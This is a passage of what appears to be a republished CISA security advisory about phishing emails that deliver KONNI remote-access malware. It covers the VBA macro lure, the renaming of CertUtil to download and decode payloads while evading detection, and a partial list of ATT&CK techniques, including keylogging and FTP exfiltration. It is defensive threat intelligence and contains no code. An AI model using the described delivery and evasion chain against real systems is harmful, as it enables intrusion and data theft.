AA20-227A: Phishing Emails Used to Deploy KONNI Malware

Original release date: August 14, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques. The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts. Technical DetailsKONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code (Phishing: Spearphising Attachment [T1566.001]). The malicious code can change the font color from light grey to black (to fool the user to enable content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (Command and Scripting Interpreter: Windows Command Shell [T1059.003]). Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection. The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file. MITRE ATT&CK Techniques According to MITRE, KONNI uses the ATT&CK techniques listed in table 1. Table 1: KONNI ATT&CK techniques Technique Use System Network Configuration Discovery [T1016] KONNI can collect the Internet Protocol address from the victim’s machine. System Owner/User Discovery [T1033] KONNI can collect the username from the victim’s machine. Masquerading: Match Legitimate Name or Location [T1036.005] KONNI creates a shortcut called Anti virus service.lnk in an apparent attempt to masquerade as a legitimate file. Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [T1048.003] KONNI has used File Transfer Protocol to exfiltrate reconnaissance data out. Input Capture: Keylogging  [T1056.001] KONNI has the capability to perform keylogging. Process Discovery [T1057] KONNI has used tasklist.exe to get a snapshot of the current processes’ state of the target machine. Command and Scripting Interpreter: PowerShell [T1059.001] KONNI used PowerShell to download and execute a specific 64-bit version of the malware. Command and Scripting Interpreter: Windows Command Shell  [T1059.003] KONNI has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection change. Indicator Removal on Host: File Deletion [T1070.004] KONNI can delete files. Application Layer Protocol: Web Protocols [T1071.001] KONNI has used Hypertext Transfer Protocol for command and control. System Information Discovery [T1082] KONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim’s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.…

Continue Reading — AA20-227A: Phishing Emails Used to Deploy KONNI Malware

What is in your mind, about this post ? Leave a Reply

  Our next learning article is ready, subscribe it in your email

What is your Learning Goal for Next Six Months ? Talk to us